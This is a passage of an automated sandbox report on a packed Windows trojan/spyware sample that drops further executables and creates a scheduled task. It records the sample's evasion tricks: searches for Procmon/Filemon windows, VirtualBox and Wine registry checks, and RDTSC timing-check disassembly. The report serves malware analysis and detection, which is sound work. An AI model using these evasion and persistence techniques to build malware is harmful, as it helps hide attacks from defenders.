            Source: random.exeStatic PE information: Section: ZLIB complexity 0.998810907369146
            Source: random.exeStatic PE information: Section: kxeedhki ZLIB complexity 0.9945873222615107
            Source: rapes.exe.0.drStatic PE information: Section: ZLIB complexity 0.998810907369146
            Source: rapes.exe.0.drStatic PE information: Section: kxeedhki ZLIB complexity 0.9945873222615107
            Source: random[1].exe.10.drStatic PE information: Section: ZLIB complexity 0.9958632569875776
            Source: random[1].exe.10.drStatic PE information: Section: brhrhyxz ZLIB complexity 0.9953532215250965
            Source: aae6fb6455.exe.10.drStatic PE information: Section: ZLIB complexity 0.9958632569875776
            Source: aae6fb6455.exe.10.drStatic PE information: Section: brhrhyxz ZLIB complexity 0.9953532215250965
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/5@0/2
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
            Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4aJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: random.exeVirustotal: Detection: 54%
            Source: random.exeReversingLabs: Detection: 61%
            Source: random.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: random.exeString found in binary or memory: " /add
            Source: random.exeString found in binary or memory: " /add /y
            Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: rapes.exeString found in binary or memory: " /add /y
            Source: rapes.exeString found in binary or memory: " /add
            Source: C:\Users\user\Desktop\random.exeFile read: C:\Users\user\Desktop\random.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
            Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
            Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: mstask.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: dui70.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: duser.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: chartv.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: atlthunk.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
            Source: random.exeStatic file information: File size 1903104 > 1048576
            Source: random.exeStatic PE information: Raw size of kxeedhki is bigger than: 0x100000 < 0x19f600

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\random.exeUnpacked PE file: 0.2.random.exe.630000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kxeedhki:EW;fwpnfjce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kxeedhki:EW;fwpnfjce:EW;.taggant:EW;
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 2.2.rapes.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kxeedhki:EW;fwpnfjce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kxeedhki:EW;fwpnfjce:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: random[1].exe.10.drStatic PE information: real checksum: 0x211338 should be: 0x11726a
            Source: rapes.exe.0.drStatic PE information: real checksum: 0x1d738c should be: 0x1dd6b0
            Source: random.exeStatic PE information: real checksum: 0x1d738c should be: 0x1dd6b0
            Source: aae6fb6455.exe.10.drStatic PE information: real checksum: 0x211338 should be: 0x11726a
            Source: random.exeStatic PE information: section name:
            Source: random.exeStatic PE information: section name: .idata
            Source: random.exeStatic PE information: section name:
            Source: random.exeStatic PE information: section name: kxeedhki
            Source: random.exeStatic PE information: section name: fwpnfjce
            Source: random.exeStatic PE information: section name: .taggant
            Source: rapes.exe.0.drStatic PE information: section name:
            Source: rapes.exe.0.drStatic PE information: section name: .idata
            Source: rapes.exe.0.drStatic PE information: section name:
            Source: rapes.exe.0.drStatic PE information: section name: kxeedhki
            Source: rapes.exe.0.drStatic PE information: section name: fwpnfjce
            Source: rapes.exe.0.drStatic PE information: section name: .taggant
            Source: random[1].exe.10.drStatic PE information: section name:
            Source: random[1].exe.10.drStatic PE information: section name: .idata
            Source: random[1].exe.10.drStatic PE information: section name:
            Source: random[1].exe.10.drStatic PE information: section name: brhrhyxz
            Source: random[1].exe.10.drStatic PE information: section name: epnvongl
            Source: random[1].exe.10.drStatic PE information: section name: .taggant
            Source: aae6fb6455.exe.10.drStatic PE information: section name:
            Source: aae6fb6455.exe.10.drStatic PE information: section name: .idata
            Source: aae6fb6455.exe.10.drStatic PE information: section name:
            Source: aae6fb6455.exe.10.drStatic PE information: section name: brhrhyxz
            Source: aae6fb6455.exe.10.drStatic PE information: section name: epnvongl
            Source: aae6fb6455.exe.10.drStatic PE information: section name: .taggant
            Source: random.exeStatic PE information: section name: entropy: 7.9846191069789585
            Source: random.exeStatic PE information: section name: kxeedhki entropy: 7.9528736172772545
            Source: rapes.exe.0.drStatic PE information: section name: entropy: 7.9846191069789585
            Source: rapes.exe.0.drStatic PE information: section name: kxeedhki entropy: 7.9528736172772545
            Source: random[1].exe.10.drStatic PE information: section name: entropy: 7.936183109326582
            Source: random[1].exe.10.drStatic PE information: section name: brhrhyxz entropy: 7.917614522664465
            Source: aae6fb6455.exe.10.drStatic PE information: section name: entropy: 7.936183109326582
            Source: aae6fb6455.exe.10.drStatic PE information: section name: brhrhyxz entropy: 7.917614522664465
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10362200101\aae6fb6455.exeJump to dropped file
            Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
            Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\random.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 81DBDB second address: 81DBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 81DBDF second address: 81DBF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A1h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 81DEB5 second address: 81DECB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6B8D266C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jbe 00007F6B8D266C36h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 81DECB second address: 81DECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 81E1AD second address: 81E1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6B8D266C42h 0x0000000c jmp 00007F6B8D266C46h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 81E1DC second address: 81E1E6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B8CF11196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 81E1E6 second address: 81E1EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 81E1EB second address: 81E1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 81E362 second address: 81E368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8211FE second address: 821279 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6B8CF11196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jp 00007F6B8CF111AAh 0x00000012 jmp 00007F6B8CF111A4h 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F6B8CF11198h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 cmc 0x00000033 mov esi, dword ptr [ebp+122D3B19h] 0x00000039 push 00000000h 0x0000003b mov esi, dword ptr [ebp+122D17DBh] 0x00000041 call 00007F6B8CF1119Fh 0x00000046 mov cl, bl 0x00000048 pop edi 0x00000049 push CC4441C1h 0x0000004e push ebx 0x0000004f pushad 0x00000050 jnl 00007F6B8CF11196h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 821279 second address: 8212CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 33BBBEBFh 0x0000000d push 00000003h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F6B8D266C38h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov edi, 6479968Ch 0x0000002e push 00000000h 0x00000030 cmc 0x00000031 or edi, dword ptr [ebp+122D2BDDh] 0x00000037 push 00000003h 0x00000039 js 00007F6B8D266C3Ah 0x0000003f push esi 0x00000040 pushad 0x00000041 popad 0x00000042 pop esi 0x00000043 push 66E4EC14h 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d pop eax 0x0000004e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 821391 second address: 8213C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B8CF11196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov esi, 60A09305h 0x00000013 push 00000000h 0x00000015 add edx, 0F77EA41h 0x0000001b call 00007F6B8CF11199h 0x00000020 push ecx 0x00000021 je 00007F6B8CF11198h 0x00000027 push esi 0x00000028 pop esi 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8213C5 second address: 8213CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8213CA second address: 8213D4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B8CF1119Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8213D4 second address: 821402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b jmp 00007F6B8D266C46h 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jnl 00007F6B8D266C36h 0x0000001c pop esi 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 821402 second address: 821407 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 82161B second address: 821673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 7C90D971h 0x0000000c adc dl, 00000063h 0x0000000f push 00000003h 0x00000011 mov cx, 7110h 0x00000015 push 00000000h 0x00000017 mov edi, edx 0x00000019 push 00000003h 0x0000001b xor dword ptr [ebp+122D2BD6h], ecx 0x00000021 call 00007F6B8D266C39h 0x00000026 pushad 0x00000027 jl 00007F6B8D266C38h 0x0000002d push eax 0x0000002e pop eax 0x0000002f js 00007F6B8D266C38h 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 push eax 0x00000039 push esi 0x0000003a jmp 00007F6B8D266C3Ch 0x0000003f pop esi 0x00000040 mov eax, dword ptr [esp+04h] 0x00000044 pushad 0x00000045 push edi 0x00000046 push esi 0x00000047 pop esi 0x00000048 pop edi 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 821673 second address: 821677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 821677 second address: 82169C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jno 00007F6B8D266C36h 0x00000011 jmp 00007F6B8D266C3Bh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F6B8D266C36h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84068F second address: 840697 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83EAD7 second address: 83EAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C44h 0x00000007 jnc 00007F6B8D266C36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83EAF5 second address: 83EB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F6B8CF11196h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83EB01 second address: 83EB05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 809B94 second address: 809B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83EEED second address: 83EEFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F6B8D266C36h 0x00000009 pop esi 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83EEFA second address: 83EF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83F4A7 second address: 83F4AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83F4AD second address: 83F4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83F76C second address: 83F77E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83F77E second address: 83F782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83F782 second address: 83F78E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83F8AF second address: 83F8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 83F8B5 second address: 83F8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84028A second address: 840294 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6B8CF11196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 845961 second address: 845967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 844892 second address: 844896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
